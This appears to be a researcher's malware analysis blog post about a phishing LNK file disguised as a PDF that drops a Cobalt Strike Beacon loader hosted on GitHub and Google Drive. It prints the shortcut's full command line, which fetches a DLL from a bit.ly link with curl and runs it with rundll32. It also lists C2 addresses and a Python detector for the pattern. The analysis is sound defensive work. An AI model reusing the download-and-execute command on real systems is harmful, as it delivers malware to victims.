Introduction
Hello. I am morimolymoly.
I accidentally hunted an unknown red team's (I guess) CobaltStrike Beacon.
I tweeted about this case in 2022.
LNK -> PDF, Malware(Shellcode: CobaltStrike Beacon)
— moly (@morimolymoly2) December 14, 2022
C2: 18.65.162[.]119:443
VT: https://t.co/QrHpUuSUaB
shellcode: https://t.co/1fBJ0KqM9k
pdb: C:\Users\win10\source\repos\SysLoaderDll2Sandbox\x64\Debug\SysloaderDLL2Sandbox.pdb pic.twitter.com/UeH1R4hBkm
Hunting
I was hunting DPRK's CryptoMimic campaign with VirusTotal LiveHunt. However, a different actor using similar TTPs was caught accidentally.
TTPs
CryptoMimic used a malicious LNK file containing a bitly link to the malware. The TTP in this case is similar.
However, this threat actor abused GitHub and Google Drive.
That is the funny point of this case.
Analysis
I analyzed the LNK file with LECmd.
LECmd version 1.5.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

Command line: -f .\aaaaaa.lnk

Warning: Administrator privileges not found!

Processing C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk

Source file: C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk
  Source created:  2022-12-13 23:33:36
  Source modified: 2022-12-13 23:33:36
  Source accessed: 2022-12-13 23:33:36

--- Header ---
  Target created:  2022-10-21 16:53:41
  Target modified: 2022-10-21 16:53:41
  Target accessed: 2022-12-12 10:46:28

  File size: 236,544
  Flags: HasTargetIdList, HasLinkInfo, HasArguments, HasIconLocation, IsUnicode, HasExpString
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Arguments: /c "start /B C:\"Program Files (x86)"\Microsoft\Edge\Application\msedge.exe --kiosk https://bit.ly/3Pkc8Kw & start /B C:\Windows\System32\curl.exe -s -L -o %temp%\t.dll https://bit.ly/3Fmt3aC & timeout 2 & rundll32 %temp%\t.dll,mydllmain"
Icon Location: %ProgramW6432%\Adobe\Acrobat DC\Acrobat\Acrobat.exe

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>> Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: 4843E915
  Label: (No label)
  Local path: C:\Windows\System32\cmd.exe

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: My Computer\C:\\\

  -Root folder: GUID ==> My Computer

  -Drive letter ==> C:

  -Directory ==> (None)
    Short name: Windows
    Modified: 2022-12-12 10:01:44
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name:
    Created: 2019-12-07 09:03:46
    Last access: 2022-12-12 10:01:44
    MFT entry/sequence #: 134345/125 (0x20CC9/0x7D)

  -Directory ==> (None)
    Short name: System32
    Modified: 2022-11-24 14:04:08
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name:
    Created: 2019-12-07 09:03:46
    Last access: 2022-12-12 10:51:08
    MFT entry/sequence #: 207770/58 (0x32B9A/0x3A)

  -File ==> (None)
    Short name: cmd.exe
    Modified: 2022-10-21 16:53:42
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name:
    Created: 2022-10-21 16:53:42
    Last access: 2022-12-12 10:46:30
    MFT entry/sequence #: 378353/49 (0x5C5F1/0x31)

--- End Target ID information ---

--- Extra blocks information ---

>> Environment variable data block
  Environment variables: %COMSPEC%

>> Special folder data block
  Special Folder ID: 37

>> Known folder data block
  Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System32

>> Tracker database block
  Machine ID: vm01
  MAC Address: 08:00:27:68:4d:30
  MAC Vendor: PCS SYSTEMTECHNIK
  Creation: 2022-11-28 11:27:11
  Volume Droid: 66055d2a-26cb-4919-96d2-3aff711ffc8b
  Volume Droid Birth: 66055d2a-26cb-4919-96d2-3aff711ffc8b
  File Droid: 99cf2333-6f0f-11ed-b3f3-080027684d30
  File Droid birth: 99cf2333-6f0f-11ed-b3f3-080027684d30

>> Property store data block (Format: GUID\ID Description ==> Value)
  46588ae2-4cbc-4338-bbfc-139326986dce\4 SID ==> S-1-5-21-2536987187-3715387138-3086421273-1001
  446d16b1-8dad-4870-a748-402ea43d788c\104 Volume Id ==> Unmapped GUID: 72f0c558-0000-0000-0000-501f00000000
This LNK file opens a decoy URL in Edge kiosk mode, downloads the malware (a DLL, t.dll) from a bitly link with curl, and launches t.dll's mydllmain export with rundll32.
The naming seems cheap.
I guessed that this was not done by BlueNoroff.
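As an added example (not code from the original post), the following Python check takes the cmd.exe argument string LECmd recovered above and flags the download-then-rundll32 chain it encodes, with a kiosk-mode browser launch noted as the decoy. The sample names, the benign comparison shortcut and the small downloader/loader lists are constructed assumptions, not an exhaustive rule set.

```python
import re
# Constructed samples: the Arguments field LECmd recovered from aaaaaa.lnk above, plus a benign shortcut for comparison.
SAMPLES = {
    "aaaaaa.lnk": (
        '/c "start /B C:\\"Program Files (x86)"\\Microsoft\\Edge\\Application\\msedge.exe'
        " --kiosk https://bit.ly/3Pkc8Kw & start /B C:\\Windows\\System32\\curl.exe -s -L"
        ' -o %temp%\\t.dll https://bit.ly/3Fmt3aC & timeout 2 & rundll32 %temp%\\t.dll,mydllmain"'
    ),
    "report.lnk": "/c curl.exe -s -o %temp%\\r.csv https://example.invalid/r.csv & start %temp%\\r.csv",
}
DOWNLOADERS = {"curl.exe": "-o", "curl": "-o"}  # assumed tool -> flag that names its output file
LOADERS = {"rundll32", "rundll32.exe", "regsvr32", "regsvr32.exe"}  # assumed DLL loaders
URL_RE = re.compile(r"https?://\S+", re.I)
TEMP_RE = re.compile(r"%temp%|\\appdata\\local\\temp\\", re.I)

def split_stages(arguments):
    """Split a 'cmd.exe /c "..."' argument string into its &-separated stages."""
    body = arguments.strip()
    if body.lower().startswith("/c"):
        body = body[2:].strip().strip('"')
    return [s.strip() for s in re.split(r"\s*&&?\s*", body) if s.strip()]

def program_name(tokens):  # basename of the first .exe token, else of the first token
    exe = next((t for t in tokens if t.lower().endswith(".exe")), tokens[0])
    return exe.rsplit("\\", 1)[-1].lower()

def analyze_lnk_arguments(arguments):
    """Return (findings, chain); chain is True when a downloaded file is later loaded."""
    findings, downloaded, chain = [], set(), False
    for stage in split_stages(arguments):
        tokens = [t for t in stage.split() if t.lower() not in ("start", "/b")]
        if not tokens:
            continue
        exe = program_name(tokens)
        if exe in DOWNLOADERS and URL_RE.search(stage):
            flag = DOWNLOADERS[exe]
            if flag in tokens[:-1]:  # the output path is the token after the flag
                out = tokens[tokens.index(flag) + 1].lower()
                downloaded.add(out)
                if TEMP_RE.search(out):
                    findings.append(f"download to temp path: {out}")
        elif exe in LOADERS and len(tokens) > 1:
            target = tokens[1].split(",")[0].lower()  # rundll32 takes "path,Export"
            if target in downloaded:
                findings.append(f"{exe} loads just-downloaded {target}")
                chain = True
        elif "--kiosk" in tokens and URL_RE.search(stage):
            findings.append(f"decoy: {exe} opened in kiosk mode")
    return findings, chain
```

A download to %temp% alone (the benign sample) is only a weak signal; the strong one is a later stage loading exactly the file that was just fetched.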
I started to analyze the malware itself.
The sample's VT entry is below.
It creates an IE process and injects shellcode into it.
The shellcode is XOR-encoded, as you can see.
I dumped the shellcode with x64dbg.
The shellcode is below.
I found an interesting string in the malware (t.dll).
So I call this malware SysLoader.
When you launch SysLoader, a decoy document is shown while the shellcode (CobaltStrike Beacon) is running.
SysLoader is reached via a bitly link, but it was actually hosted in a GitHub repo.
Web service abuse
The decoy document was hosted on Google Drive.
SysLoader was hosted on GitHub.
A maldoc is also hosted there, as you can see.
I ran olevba on this maldoc. It contains a macro which downloads and launches SysLoader.
Here is the commit log of the repository.
I just wanted to see the traffic, so I launched FakeNet-NG and watched what was going on.
Then I realized this is a CobaltStrike Beacon and its profile is Pandora.
The CobaltStrike Beacon's watermark is 546921291.
This watermark seems to be a legitimate one, so I attributed this actor to some red team. The C2 server is located in the AWS Japan region. This does not make sense for APTs.
Summary
This actor seems to be a red teamer at some company.
The malware itself is cheap to analyze.
There is no obfuscation or packer.
I guess the Cobalt Strike Beacon is an original, legitimate one, judging from the watermark.
I think this operation was done by some red team to test its TTPs.
IOCs
- hxxps://github.com/encerepo/resources
- 38.242.255[.]184
- C2: dqfkmwvib0lbb[.]cloudfront[.]net
- C2: 18.65.152[.]13